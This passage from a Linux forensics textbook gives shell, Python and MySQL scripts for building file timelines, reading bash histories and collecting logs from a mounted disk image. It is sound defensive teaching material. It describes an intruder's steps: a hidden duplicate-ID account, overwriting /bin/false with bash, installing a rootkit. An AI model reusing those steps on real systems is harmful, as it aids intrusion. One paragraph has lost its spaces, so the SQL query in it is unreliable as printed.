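full_field = ("A" * 36).encode("utf-16-le")

print(decode_partition_name(field))
print(len(decode_partition_name(full_field)))
```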
The MbrRecord class still hasn't gone away. This class is used to read the protective MBR as a sanity check. You will see that the main function starts out the same as before by reading the first sector and using MbrRecord to parse it. The second sanity check causes the script to exit if the first partition is not type 0xEE, which indicates a GPT drive.
The third sanity check reads the GPT header in the second sector and checks for the string "EFI PART" which should be stored in the first eight bytes of this sector. If this final check passes, the image is reopened and the next 32 sectors containing the 128 GPT entries are read.
We then have a new kind of for loop in this code:
for i in range(0, 128):
    p = GptRecord(partRecs, i)
    if not p.empty:
        p.printPart()
        parts.append(p)
Now instead of iterating over a named list or tuple we are using an explicit range of numbers. It turns out that we are still iterating over a list. In Python 2, which these scripts target, the range(n, m) function creates a list of integers in the range [n, m). (In Python 3 it returns an immutable range object instead, which is iterated in exactly the same way.) This is what is commonly called a half open range. The n is included in the range (hence '[' on that end) and the m is not (as denoted by ')' on that end). For example, in Python 2 range(0, 5) evaluates to the list [0, 1, 2, 3, 4]. Non-empty partitions are printed and added to the parts list. You may be wondering why I don't stop once an empty record has been encountered. It is valid, though somewhat unusual, to have empty entries in the middle of the GPT.
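The half open behavior is easy to confirm interactively. The short sketch below is written for Python 3, where range returns a range object, so list() is used to show the values; the variable names are chosen only for this example.

```python
entries = range(0, 5)
as_list = list(entries)            # materialize the values for display

includes_lower = 0 in entries      # the lower bound is part of the range
includes_upper = 5 in entries      # the upper bound is not

gpt_indexes = range(0, 128)        # the indexes used for the 128 GPT entries

print(as_list)
print(includes_lower, includes_upper)
print(len(gpt_indexes), gpt_indexes[-1])
```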
Once the entire GPT has been parsed we iterate over the parts list and attempt to mount any supported partitions. The methods used are the same as those from the previous mounting scripts. The results of running this script against an image using GUID partitions are shown in Figure 5.14. Note that this script was intentionally run without root privileges so that the mounts would fail as the image used was corrupted.
FIGURE 5.14
Mounting GUID-based partitions from an image file. Note: the script was intentionally run without root privileges to prevent mounting of an image that was corrupted.
SUMMARY
We have covered a lot of ground in this chapter. We discussed the basics of mounting different types of partitions found in image files. Some readers may have learned a little Python along the way as we discussed how Python could be used to automate this process. In the next chapter we will discuss investigating the filesystem(s) mounted from your disk image.
CHAPTER 6
Analyzing Mounted Images
INFORMATION IN THIS CHAPTER:
Getting metadata from an image
Using LibreOffice in an investigation
Using MySQL in an investigation
Creating timelines
Extracting bash histories
Extracting system logs
Extracting logins and login attempts
GETTING MODIFICATION, ACCESS, AND CREATION TIMESTAMPS
Now that you have an image mounted, the full set of Linux system tools is available to you. One of the first things you might want to do is create a timeline. At a minimum you will want to check all of the usual directories that attackers target such as /sbin and /bin. Naturally, we can still use some scripting to help with the process. The following script will extract modification, access, and creation (MAC) times and other metadata from a given directory and output the information in semicolon separated values for easy import into a spreadsheet or database.
#!/bin/bash
#
# getmacs.sh
#
# Simple shell script to extract MAC times from an image to
# a CSV file for import into a spreadsheet or database.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)
usage () {
    echo "usage: $0 <starting directory>"
    echo "Simple script to get MAC times from an image and output CSV"
    exit 1
}
if [ $# -lt 1 ] ; then
    usage
fi
# semicolon delimited file which makes import to spreadsheet easier
# printf is access date, access time, modify date, modify time,
# create date, create time, permissions, user id,
# group id, file size, filename and then line feed
# (find's %C directives report the inode status change time)
olddir=$(pwd)
cd "$1" # this avoids having the mount point added to every filename
printf "AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;\
CreateTime;Permissions;UserID;GroupID;FileSize;Filename\n"
find ./ -printf "%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%G;%s;%p\n"
cd "$olddir"
The script is straightforward and contains no techniques that have not already been discussed in this book. The one thing you might be curious about is saving the current directory with olddir=$(pwd), changing to the specified directory, and then changing back to $olddir with cd at the end. This is done to prevent the full path (including the mount point specified) from being added to the front of each filename in the output.
Partial results of running this script against a subject system are shown in Figure 6.1. Normally you will want to capture the results to a file using getmacs.sh {mount point of subject filesystem} > {output file}. For example, getmacs.sh /media/part0 > pfe1.csv.
FIGURE 6.1
Getting metadata for input to a spreadsheet or database.
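If you would rather stay in Python, roughly the same rows can be produced with os.walk and os.lstat. The following Python 3 sketch is not the getmacs.sh script, only an approximation of it under stated assumptions: the names stamp and metadata_rows are invented here, dates are forced to month/day/year rather than following the locale, times are truncated to whole seconds, and the columns labeled as create times come from st_ctime (the inode status change time).

```python
import os
import tempfile
import time

HEADER = ("AccessDate;AccessTime;ModifyDate;ModifyTime;CreateDate;"
          "CreateTime;Permissions;UserID;GroupID;FileSize;Filename")

def stamp(epoch):
    """Split an epoch time into (date, time) strings in local time."""
    t = time.localtime(epoch)
    return time.strftime("%m/%d/%Y", t), time.strftime("%H:%M:%S", t)

def metadata_rows(top):
    """Yield one semicolon-separated row per entry found under top."""
    paths = [top]
    for dirpath, dirnames, filenames in os.walk(top):
        paths.extend(os.path.join(dirpath, n) for n in dirnames + filenames)
    for path in paths:
        st = os.lstat(path)            # lstat so symlinks are not followed
        rel = os.path.relpath(path, top)
        name = "./" if rel == "." else "./" + rel
        fields = (*stamp(st.st_atime), *stamp(st.st_mtime),
                  *stamp(st.st_ctime), "%o" % (st.st_mode & 0o7777),
                  st.st_uid, st.st_gid, st.st_size, name)
        yield ";".join(str(f) for f in fields)

# Demonstration on a throwaway directory rather than a mounted image.
with tempfile.TemporaryDirectory() as demo_dir:
    with open(os.path.join(demo_dir, "a.txt"), "w") as f:
        f.write("abc")
    demo_rows = list(metadata_rows(demo_dir))

print(HEADER)
for row in demo_rows:
    print(row)
```

Filenames that themselves contain semicolons would break the column layout here, just as they would in the shell version.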
IMPORTING INFORMATION INTO LIBREOFFICE
The output from the previous script is easily imported into LibreOffice Calc or another spreadsheet. Simply open the semicolon-separated file. You will need to specify what is used to separate the values (a semicolon for us) and should also select the format used for the date columns as shown in Figure 6.2.
FIGURE 6.2
Importing a semicolon-separated file into LibreOffice. Note that the date columns should be formatted as dates as shown.
The spreadsheet is easily sorted by any of the dates and times. To sort the spreadsheet select the columns to be sorted and then select sort from the data menu. You will be greeted with a screen such as that shown in Figure 6.3.
FIGURE 6.3
Sorting the spreadsheet by access times.
After we have sorted the spreadsheet it is much easier to see related activities, or at least the files that have been accessed around the same time, possibly related to actions by an attacker. The highlighted rows in Figure 6.4 show a rootkit that was downloaded by the john account being accessed.
FIGURE 6.4
After sorting the spreadsheet by access times the download and installation of a rootkit is easily seen.
IMPORTING DATA INTO MySQL
Importing our data into a spreadsheet is an easy process. It does suffer when it comes to performance if the subject filesystem is large, however. There is another limitation of this method as well. It is not easy to make a true timeline where modification, access, and creation times are all presented on a single timeline. You could create a body file for use with Autopsy, but I have found that the performance is still lacking and this is not nearly as flexible as having everything in a proper database.
If you do not already have MySQL installed on your forensics workstation, it is quite simple to add. For Debian and Ubuntu based systems sudo apt-get install mysql-server should be all you need. Once MySQL has been installed you will want to create a database. To keep things clean, I recommend you create a new database for each case. The command to create a new database is simply mysqladmin -u <user> -p create <database name>. For example, if I want to log in as the root user (which is not necessarily the same as the root user on the system) and create a database for case-pfe1 I would type mysqladmin -u root -p create case-pfe1. The -p option means please prompt me for a password (passing it in on the command line would be very bad security as this could be intercepted easily). The user login information should have been set up when MySQL was installed.
Once a database has been created it is time to add some tables. The easiest way to do this is to start the MySQL client using mysql -u <user> -p, e.g. mysql -u root -p. You are not yet connected to your database. To remedy that situation issue the command connect <database> in the MySQL client shell. For example, in my case I would type connect case-pfe1. Logging in to MySQL and connecting to a database is shown in Figure 6.5.
FIGURE 6.5
Logging in with the MySQL client and connecting to a database.
The following SQL code will create a database table that can be used to import the semicolon-separated values in the file generated by our shell script. This script may be saved to a file and executed in the MySQL client. It is also just as easy to cut and paste it into MySQL.
create table files (
    AccessDate date not null,
    AccessTime time not null,
    ModifyDate date not null,
    ModifyTime time not null,
    CreateDate date not null,
    CreateTime time not null,
    Permissions smallint not null,
    -- int rather than smallint: IDs such as 65534 do not fit in a smallint
    UserId int not null,
    GroupId int not null,
    FileSize bigint not null,
    Filename varchar(2048) not null,
    recno bigint not null auto_increment,
    primary key (recno)
);
We can see that this is a fairly simple table. All of the columns are declared 'not null' meaning that they cannot be empty. For readers not familiar with MySQL the last two lines might require some explanation. The first creates a column, recno, which is a long integer and sets it to automatically increment an internal counter every time a new row is inserted. On the next line recno is set as the primary key. The primary key uniquely identifies each row and is indexed, which allows information in the table to be sorted and retrieved quickly.
Creating this table is shown in Figure 6.6. Notice that MySQL reports 0 rows affected which is correct. Adding a table does not create any rows (records) in it.
FIGURE 6.6
Create a table to store file metadata in MySQL.
Now that there is a place for data to go, the information from our shell script can be imported. MySQL has a load data infile command that can be used for this purpose. There is a small complication that must be worked out before running this command. The date strings in the file must be converted to proper MySQL date objects before insertion in the database. This is what is happening in the set clause of the following script. There is also a line that reads ignore 1 rows which tells MySQL to ignore the headers at the top of our file that exist to make a spreadsheet import easier.
load data infile '/tmp/case-pfe1.csv'
into table files
fields terminated by ';'
enclosed by '"'
lines terminated by '\n'
ignore 1 rows
(@AccessDate, AccessTime, @ModifyDate, ModifyTime, @CreateDate,
CreateTime, Permissions, UserId, GroupId, FileSize, Filename)
set AccessDate = str_to_date(@AccessDate, "%m/%d/%Y"),
ModifyDate = str_to_date(@ModifyDate, "%m/%d/%Y"),
CreateDate = str_to_date(@CreateDate, "%m/%d/%Y");
The file to be imported must be in an approved directory or MySQL will ignore it. This is a security measure. This would prevent, among other things, an attacker who exploits a SQL vulnerability on a website from uploading a file to be executed, assuming that MySQL won't accept files from any directory accessible by the webserver. You could change the list of directories in the MySQL files, but it is probably simpler to just copy your file to /tmp for the import as I have done.
Loading file metadata from the PFE subject system is shown in Figure 6.7. Notice that my laptop was able to insert 184,601 rows in only 5.29 seconds. The warnings concern the date imports. As we shall see, all of the dates were properly imported.
FIGURE 6.7
Loading file metadata into MySQL.
Once the data is imported you are free to query your one table database to your heart's content. For example, to get these 184,601 files sorted by access time in descending order (so the latest activity is on the top) simply run the query select * from files order by accessdate desc, accesstime desc;. The results of running this query are shown in Figure 6.8. Note that retrieving 184,601 sorted rows required a mere 0.71 seconds on my laptop. If you prefer an ascending sort just omit 'desc' in the SQL query above.
FIGURE 6.8
Using MySQL to sort file metadata by access time.
Astute readers may have noticed that our script imported user and group IDs, not names. This was intentional. Why did we do it this way? If you stop to think about it, it will occur to you that when you list files on your Linux machine using ls, the ls program is using the password and group files to translate user and group IDs stored in the inodes (more about these later in the book) to names. You have mounted a filesystem from another computer on your forensics workstation and ls will use your /etc/passwd and /etc/group files to translate IDs to names, not the correct files from the subject system. This issue is shown in Figure 6.9 where all of the john user's files report that they belong to the phil user because the user ID for john on the subject system is the same as the user ID for phil on my forensics workstation. In cases where the user ID is not found on the forensics workstation the raw user ID is displayed rather than the incorrect name.
FIGURE 6.9
User names incorrectly displayed for a mounted subject filesystem.
We can easily display the correct user and group name in queries of our database if we create two new tables and import the /etc/passwd and /etc/group files from the subject system. This is straightforward thanks to the fact that these files are already colon delimited. Importing this information is as simple as copying the subject's passwd and group files to /tmp (or some other directory MySQL has been configured to use for imports), and then running the following SQL script.
create table users (
    username varchar(255) not null,
    passwordHash varchar(255) not null,
    uid int not null,
    gid int not null,
    userInfo varchar(255) not null,
    homeDir varchar(255) not null,
    shell varchar(2048) not null,
    primary key (username)
);
load data infile '/tmp/passwd'
into table users
fields terminated by ':'
enclosed by '"'
lines terminated by '\n';
create table groups (
    groupname varchar(255) not null,
    passwordHash varchar(255) not null,
    gid int not null,
    userlist varchar(2048)
);
load data infile '/tmp/group'
into table groups
fields terminated by ':'
enclosed by '"'
lines terminated by '\n';
This code is a bit simpler than the import for our metadata file. The primary reason for this is that there are no dates or other complex objects to convert. You will note that I have used the username and not the user ID as the primary key for the users table. The reason for this is that if an attacker has added an account with a duplicate ID, the import would fail as primary keys must be unique. It is not unusual for an attacker to create a new account that shares an ID, especially ID 0 for the root user. Executing the script above to load these two tables is shown in Figure 6.10.
FIGURE 6.10
Importing user and group information into MySQL.
Now that the user information has been imported I can perform some simple queries. It might be useful to see what shells are being used for each user. An attacker might change the shell of system accounts to allow login. Such accounts normally have a login shell of /usr/sbin/nologin or /bin/false. The results of executing the query select * from users order by uid; are shown in Figure 6.11. The results show that an attacker has created a bogus johnn account.
FIGURE 6.11
Selecting users from the database. Note the bogus johnn account that has been created by an attacker.
If an attacker has reused a user ID, that is easily detected. In addition to looking at the results from the previous query in order to see everything in the users table sorted by user ID, another query will instantly let you know if duplicate IDs exist. The query select distinct uid from users; should return the same number of rows as the previous query (38 in the case of the subject system). If it returns fewer rows, then duplicates exist.
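The same duplicate check can be run directly on a copy of the subject's passwd file without a database. The Python 3 sketch below is an illustration only: the function name duplicate_uids is an assumption, and the sample passwd content is invented for the example rather than taken from the subject system.

```python
from collections import defaultdict

def duplicate_uids(passwd_text):
    """Return {uid: [usernames]} for every user ID used more than once."""
    by_uid = defaultdict(list)
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # A passwd entry has seven colon-separated fields; skip anything else.
        if len(fields) < 7 or not fields[2].isdigit():
            continue
        by_uid[int(fields[2])].append(fields[0])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}

# Made-up sample data for illustration.
sample = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
john:x:1000:1000:John,,,:/home/john:/bin/bash
johnn:x:0:0:,,,:/home/johnn:/bin/bash
"""

dups = duplicate_uids(sample)
print(dups)
```

Unlike comparing row counts, this reports which accounts share an ID.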
Is there any value in viewing the group file information? Yes. The group file contains a list of users who belong to each group. If an attacker has added himself/herself to a group, it will show up here. New users in the sudo, adm, or wheel groups that are used to determine who gets root privileges (the exact group and mechanism varies from one Linux distribution to the next) are particularly interesting. Even knowing which legitimate users are in these groups can be helpful if you think an attacker has gained root access. The results of running the query select * from groups order by groupname; are shown in Figure 6.12. It would appear from this information that the john account has administrative privileges. The query select distinct gid from groups; should return the same number of rows if there are no duplicate group numbers.
FIGURE 6.12
Examining group file information.
Let’sreturntothefilestable.Afterall,wesaidourmotivationforimportingusersandgroupswastodisplaycorrectinformation.Inordertodisplayusernamesinourquerieswemustdoadatabasejoin.IfyouarenotaSQLexpert,fearnot,thekindofjoinneededhereissimple.Weneedonlyselectfrommorethanonetableandgivetheconditionthatjoins(associates)rowsinthevarioustables.
Ifwewishtoaddusernamestothepreviousqueryofthefilestablesomethinglikethefollowing will work: select accessdate, accesstime, filename,permissions, username from files, users wherefiles.userid=users.uid order by accessdate desc, accesstimedesc.Whathavewechanged?Wehavegonefromthecatchallselect*toanexplicitlistofcolumns.Asecondtablehasbeenaddedtothefromclause.Finally,wehaveajoinclause,wherefiles.userid=users.uid,thatdetermineswhichrowintheuserstableisusedtoretrievetheusername.Ifanyofthecolumnnamesinthelistexistinbothtablesyoumustprefixthecolumnnamewith<table>.totellMySQLwhichtabletouse.TheresultsofrunningthisqueryareshowninFigure6.13.
FIGURE6.13
ResultsofrunningqueryonfilesTablewithusernamesfromuserstable.
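For readers who want to experiment with the join before touching case data, here is a small hedged sketch. It again uses sqlite3 in place of MySQL, cut-down versions of the files and users tables, and made-up rows (the file names and timestamps are illustrative only, not evidence from the subject system).

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table users (username text, uid integer);
create table files (accessdate text, accesstime text, filename text,
                    permissions text, userid integer);
-- Made-up sample data for illustration only.
insert into users values ('root', 0), ('john', 1000), ('johnn', 1001);
insert into files values
  ('2015-03-05', '23:00:08', '/home/john/example.tar.gz', '-rw-rw-r--', 1000),
  ('2015-03-09', '21:33:55', '/home/.johnn/.bashrc',      '-rw-r--r--', 1001),
  ('2015-02-01', '08:00:00', '/etc/hostname',             '-rw-r--r--', 0);
""")

# The join condition files.userid = users.uid picks the matching users row
# for every files row, so the numeric owner is displayed as a username.
rows = conn.execute("""
select accessdate, accesstime, filename, permissions, username
  from files, users
 where files.userid = users.uid
 order by accessdate desc, accesstime desc
""").fetchall()

for row in rows:
    print(row)
```

Dates are stored here as ISO-formatted text, which sorts correctly as plain strings; MySQL's native date and time columns make that workaround unnecessary.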
Notice that Figure 6.13 shows a text file in gedit. Here we have used a useful feature of the MySQL client, the tee <logfile> command. This command is similar to the shell command with the same name in that it causes output to go both to the screen and also to a specified file. This allows all query output to be captured, which can be a useful thing to store in your case directory. When you no longer want to capture output the notee command will close the file and stop sending information. You might wish to tee everything to one big log file for all your queries or store queries in their own files, your choice. MySQL has shortcuts for many commands including \T and \t for tee and notee, respectively.
You may have noticed that I primarily like to use command line tools. I realize that not everyone shares my passion for command line programs. There is absolutely nothing stopping you from using the powerful MySQL techniques described in this book within PhpMyAdmin, MySQL Workbench, or any other Graphical User Interface (GUI) tool.
Could you still do lots of forensics without using a database? Yes, you certainly could and people do. However, if you look at available tools such as Autopsy you will notice that they are relatively slow when you put them up against querying a proper database. There is another reason I prefer to import data into a database. Doing so is infinitely more flexible. See the sidebar for a perfect example.
YOU CAN'T GET THERE FROM HERE
When tools fail you
I am reminded of a joke concerning a visitor to a large city who asked a local for directions. The local responded to the request for directions by saying "You can't get there from here." Sometimes that is the case when using prepackaged tools. They just don't do exactly what you want and there is no easy way to get them to conform to your will.
Recently in one of my forensics classes at the university where I teach there was a technical issue with one of the commercial tools we use. In an attempt to salvage the rest of my 75 minute class period I turned to Autopsy. It is far from being a bad tool and it has some nice features. One of the things it supports is filters. You can filter files by size, type, etc. What you cannot do, however, is combine these filters. This is just one simple example of something that is extremely easy with a database, but if you only have prepackaged tools "You can't get there from here."
Based on our live analysis of the subject system from PFE, we know that the attack most likely occurred during the month of March. We also see that the john account was used in some way during the attack. As noted earlier in this chapter, this account has administrative privileges. We can combine these facts together to examine only files accessed and modified from March onwards that are owned by john or johnn (with user IDs of 1000 and 1001, respectively). All that is required is a few additions to the where clause in our query which now reads:
select accessdate, accesstime, filename, permissions, username
from files, users
where files.userid=users.uid
and modifydate > date('2015-03-01') and accessdate > date('2015-03-01')
and (files.userid=1000 or files.userid=1001)
order by accessdate desc, accesstime desc;
We could have used the users table to match based on username, but it is a bit easier to use the user IDs and prevents the need for a join with the users table. This query ran in 0.13 seconds on my laptop and returned only 480 rows, a reduction of over 867,000 records. This allows you to eliminate the noise and home in on the relevant information such as that shown in Figure 6.14 and Figure 6.15.
FIGURE 6.14
Evidence of a rootkit download.
FIGURE 6.15
Evidence of logging into a bogus account. Note that the modified files for the john account suggest that the attacker initially logged in with this account, switched to the johnn account as a test, and then logged off.
CREATING A TIMELINE
As we said previously, making a proper timeline with access, modification, and creation times intertwined is not easy with a simple spreadsheet. It is quite easily done with our database, however. The shell script below (which is primarily just a SQL script) will create a new timeline table in the database. The timeline table will allow us to easily and quickly create timelines.
#!/bin/bash
#
# create-timeline.sh
#
# Simple shell script to create a timeline in the database.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)

usage () {
  echo "usage: $0 <database>"
  echo "Simple script to create a timeline in the database"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

cat << EOF | mysql $1 -u root -p
create table timeline (
  Operation char(1),
  Date date not null,
  Time time not null,
  recno bigint not null
);
insert into timeline (Operation, Date, Time, recno)
  select "A", accessdate, accesstime, recno from files;
insert into timeline (Operation, Date, Time, recno)
  select "M", modifydate, modifytime, recno from files;
insert into timeline (Operation, Date, Time, recno)
  select "C", createdate, createtime, recno from files;
EOF
There is one technique in this script that requires explaining as it has not been used thus far in this book. The relevant line is cat << EOF | mysql $1 -u root -p. This construct will cat (type out) everything from the following line until the string after << (which is 'EOF' in our case) is encountered. All of these lines are then piped to mysql which is run against the passed in database ($1) with user root who must supply a password.
Looking at the SQL in this script we see that a table is created that contains a one character operation code, date, time, and record number. After the table is created three insert statements are executed to insert access, modification, and creation timestamps into the table. Note that recno in the timeline table is the primary key from the files table. Now that we have a table with all three timestamps, a timeline can be quickly and easily created. This script ran in under two seconds on my laptop.
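The idea behind the timeline table, one row per timestamp type per file, can be illustrated on a toy data set. This is a sketch under stated assumptions rather than the script itself: sqlite3 stands in for MySQL, the files table is reduced to the columns the timeline needs, the timeline columns are renamed op, evdate, and evtime to keep the example portable, and the two sample files are invented.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
create table files (recno integer primary key, filename text,
                    accessdate text, accesstime text,
                    modifydate text, modifytime text,
                    createdate text, createtime text);
-- Invented sample rows for illustration only.
insert into files values
  (1, '/tmp/a', '2015-03-09', '10:00:00',
                '2015-03-05', '23:01:10',
                '2015-03-05', '23:00:08'),
  (2, '/tmp/b', '2015-03-01', '09:00:00',
                '2015-03-01', '09:00:00',
                '2015-03-01', '09:00:00');

create table timeline (op char(1), evdate text not null,
                       evtime text not null, recno integer not null);
-- One insert per timestamp type, each tagged with its operation code.
insert into timeline (op, evdate, evtime, recno)
  select 'A', accessdate, accesstime, recno from files;
insert into timeline (op, evdate, evtime, recno)
  select 'M', modifydate, modifytime, recno from files;
insert into timeline (op, evdate, evtime, recno)
  select 'C', createdate, createtime, recno from files;
""")

timeline_rows = conn.execute("select count(*) from timeline").fetchone()[0]

# Join back to files on recno and keep only events on or after a start date.
events = conn.execute("""
select op, evdate, evtime, filename
  from files, timeline
 where files.recno = timeline.recno and evdate >= '2015-03-02'
 order by evdate desc, evtime desc
""").fetchall()

for event in events:
    print(event)
```

Every file contributes three rows, so the timeline table holds three times as many rows as the files table; the join on recno recovers the file name for each event.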
For convenience I have created a shell script that accepts a database and a starting date and then builds a timeline. This script also uses the technique that was new in the last script. Note that you can change the format string for the str_to_date function in this script if you prefer something other than the standard US date format.
#!/bin/bash
#
# print-timeline.sh
#
# Simple shell script to print a timeline.
#
# Developed for PentesterAcademy by
# Dr. Phil Polstra (@ppolstra)

usage () {
  echo "usage: $0 <database> <starting date>"
  echo "Simple script to get timeline from the database"
  exit 1
}

if [ $# -lt 2 ] ; then
  usage
fi

cat << EOF | mysql $1 -u root -p
select Operation, timeline.date, timeline.time,
  filename, permissions, userid, groupid
  from files, timeline
  where timeline.date >= str_to_date("$2", "%m/%d/%Y") and
  files.recno = timeline.recno
  order by timeline.date desc, timeline.time desc;
EOF
At this point I should probably remind you that the timestamps in our timeline could have been altered by a sophisticated attacker. We will learn how to detect these alterations later in this book. Even an attacker that knows to alter these timestamps might miss a few files here and there that will give you insight into what has transpired.
The script above was run with a starting date of March 1, 2015. Recall from our live analysis that some commands such as netstat and lsof failed, which led us to believe the system might be infected with a rootkit. The highlighted section in Figure 6.16 shows the Xing Yi Quan rootkit was downloaded into the john user's Downloads directory at 23:00:08 on 2015-03-05. As can be observed in the highlighted portion of Figure 6.17, the compressed archive that was downloaded was extracted at 23:01:10 on the same day.
FIGURE 6.16
Evidence showing the download of a rootkit.
FIGURE 6.17
Evidence of a rootkit compressed archive being uncompressed.
It appears that the attacker logged off and did not return until March 9. At that time he or she seems to have read the rootkit README file using more and then built the rootkit. Evidence to support this can be found in Figure 6.18. It is unclear why the attacker waited several days before building and installing the rootkit. Looking at the README file on the target system suggests an inexperienced attacker. There were 266 matches for the search string "xingyi" in the timeline file. The rootkit appears to have been run repeatedly. This could have been due to a system crash, reboot, or attacker inexperience.
FIGURE 6.18
Evidence showing a rootkit being built and installed.
We have really just scratched the surface of what we can do with a couple of database tables full of metadata. You can make up queries to your heart's content. We will now move on to other common things you might wish to examine while your image is mounted.
EXAMINING BASH HISTORIES
During our live response we used a script to extract users' bash command histories. Here we will do something similar except that we will use the filesystem image. We will also optionally import the results directly into a database. The script to do all this follows.
#!/bin/bash
#
# get-histories.sh
#
# Simple script to get all user bash history files and
# optionally store them in a database.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <mount point of root> [database name]"
  echo "Simple script to get user histories and \
optionally store them in the database"
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# find only files, filename is .bash_history
# use awk to prefix each history line with its filename
olddir=$(pwd)
cd $1
find home -type f -regextype posix-extended \
  -regex "home/[a-zA-Z.]+(/.bash_history)" \
  -exec awk '{ print "{};" $0 }' {} \; \
  | tee /tmp/histories.csv
# repeat for the admin user
find root -type f -regextype posix-extended \
  -regex "root(/.bash_history)" \
  -exec awk '{ print "{};" $0 }' {} \; \
  | tee -a /tmp/histories.csv
cd $olddir

if [ $# -gt 1 ] ; then
  chown mysql:mysql /tmp/histories.csv
  # the table name is left unquoted because backticks inside an
  # unquoted here document would be run as a shell command
  cat << EOF | mysql $2 -u root -p
create table if not exists histories (
  historyFilename varchar(2048) not null,
  historyCommand varchar(2048) not null,
  recno bigint not null auto_increment,
  primary key(recno)
);
load data infile "/tmp/histories.csv"
  into table histories
  fields terminated by ';'
  enclosed by '"'
  lines terminated by '\n';
EOF
fi
Back in Chapter 3, our live response script simply displayed a banner, typed out the history file contents, and displayed a footer. This will not work as a format if we wish to import the results into a spreadsheet and/or database. To get an output that is more easily imported we use awk.
Some readers may be unfamiliar with awk. It was created at Bell Labs in the 1970s by Alfred Aho, Peter Weinberger, and Brian Kernighan. Its name comes from the first letters of the authors' surnames. Awk is a text processing language. The most common use of awk in scripts is the printing of positional fields in a line of text.
Simple awk usage is best learned by examples. For example, the command echo "one two three" | awk '{ print $1 $3 }' will print "onethree". By default fields are separated by whitespace in awk. The three -exec clauses for the find command in the script presented in Chapter 3 have been replaced with the single clause -exec awk '{ print "{};" $0 }' {} \;. The $0 in this awk command refers to an entire line. This prints the filename followed by a semicolon and then each line from the file.
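For readers more comfortable with Python than awk, the two awk one-liners above behave roughly like the sketch below. The helper names join_fields and prefix_lines are invented for this illustration and are not part of any script in this book.

```python
def join_fields(line, first, second):
    """Mimic awk '{ print $1 $3 }': split on whitespace and concatenate
    two fields (awk field numbers are 1-based)."""
    fields = line.split()
    return fields[first - 1] + fields[second - 1]


def prefix_lines(filename, text):
    """Mimic awk '{ print "{};" $0 }' after find has substituted the
    filename for {}: emit 'filename;line' for every line of the file."""
    return [f"{filename};{line}" for line in text.splitlines()]


print(join_fields("one two three", 1, 3))

# A made-up two-line history file.
sample_history = "w\ncat /etc/passwd\n"
for record in prefix_lines("home/john/.bash_history", sample_history):
    print(record)
```

Each output record has exactly two semicolon-separated parts as long as the command itself contains no semicolon; a history line that does contain one would be split at that point on import.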
The database code is new if we compare this script to the similar one in Chapter 3. It is also straightforward and uses techniques previously discussed. Another thing that is done in this script is to change the owner and group of the output histories.csv file to mysql. This is done to avoid any complications loading the file into the database. Partial results from running this script against our PFE subject system are shown in Figure 6.19.
FIGURE 6.19
Extracting bash command histories from the image file.
Once the histories are loaded in the database they are easily displayed using select * from histories order by recno. This will give all user histories. Realize that each account's history will be presented in order for that user, but there is no way to tell when any of these commands were executed. The proper query to display bash history for a single user is select historyCommand from histories where historyFilename like '%<username>%' order by recno;.
The results of running the query select historyCommand from histories where historyFilename like '%.johnn%' order by recno; are shown in Figure 6.20. From this history we can see the bogus johnn user ran w to see who else was logged in and what command they last executed, typed out the password file, and switched to two user accounts that should not have login privileges.
FIGURE 6.20
Bash command history for a bogus account created by an attacker. Note that the commands being run are also suspicious.
Several interesting commands from the john account's bash history are shown in Figure 6.21. It can be seen that this user created the johnn account, copied /bin/true to /bin/false, created passwords for whoopsie and lightdm, copied /bin/bash to /bin/false, edited the group file, moved the johnn user's home directory from /home/johnn to /home/.johnn (which made the directory hidden), edited the password file, displayed the man page for sed, used sed to modify the password file, and installed a rootkit. Copying /bin/bash to /bin/false was likely done to allow system accounts to log in. This might also be one source of the constant "System problem detected" popup messages.
FIGURE 6.21
Evidence of multiple actions by an attacker using the john account.
EXAMINING SYSTEM LOGS
We might want to have a look at various system log files as part of our investigation. These files are located under /var/log. As we discussed previously, some of these logs are in subdirectories and others in the main /var/log directory. With a few exceptions these are text logs. Some have archives of the form <base log file>.n, where n is an integer, and older archives may be compressed with gzip. This leads to log files such as syslog, syslog.1, syslog.2.gz, syslog.3.gz, etc. being created.
A script very similar to one from Chapter 3 allows us to capture log files for our analysis. As with the script from the earlier chapter, we will only capture the current log. If it appears that archived logs might be relevant to the investigation they can always be obtained from the image later. Our script follows.
#!/bin/bash
#
# get-logfiles.sh
#
# Simple script to get all logs and optionally
# store them in a database.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.

usage () {
  echo "usage: $0 <mount point of root> [database name]"
  echo "Simple script to get log files and"
  echo "optionally store them to a database."
  exit 1
}

if [ $# -lt 1 ] ; then
  usage
fi

# remove old file if it exists
if [ -f /tmp/logfiles.csv ] ; then
  rm /tmp/logfiles.csv
fi

# find only files, exclude files with numbers as they are old logs
# use awk to prefix each log line with its filename
olddir=$(pwd)
cd $1/var
find log -type f -regextype posix-extended \
  -regex 'log/[a-zA-Z.]+(/[a-zA-Z.]+)*' \
  -exec awk '{ print "{};" $0 }' {} \; \
  | tee -a /tmp/logfiles.csv
cd $olddir

if [ $# -gt 1 ] ; then
  chown mysql:mysql /tmp/logfiles.csv
  clear
  echo "Let's put that in the database"
  cat << EOF | mysql $2 -u root -p
create table if not exists logs (
  logFilename varchar(2048) not null,
  logentry varchar(2048) not null,
  recno bigint not null auto_increment,
  primary key(recno)
);
load data infile "/tmp/logfiles.csv"
  into table logs
  fields terminated by ';'
  enclosed by '"'
  lines terminated by '\n';
EOF
fi
There are no techniques used in this script that have not been discussed earlier in this book. Running this against the PFE subject system yields 74,832 entries in our database in 32 log files. Some of these results are shown in Figure 6.22.
FIGURE 6.22
Partial results of importing log files into the database.
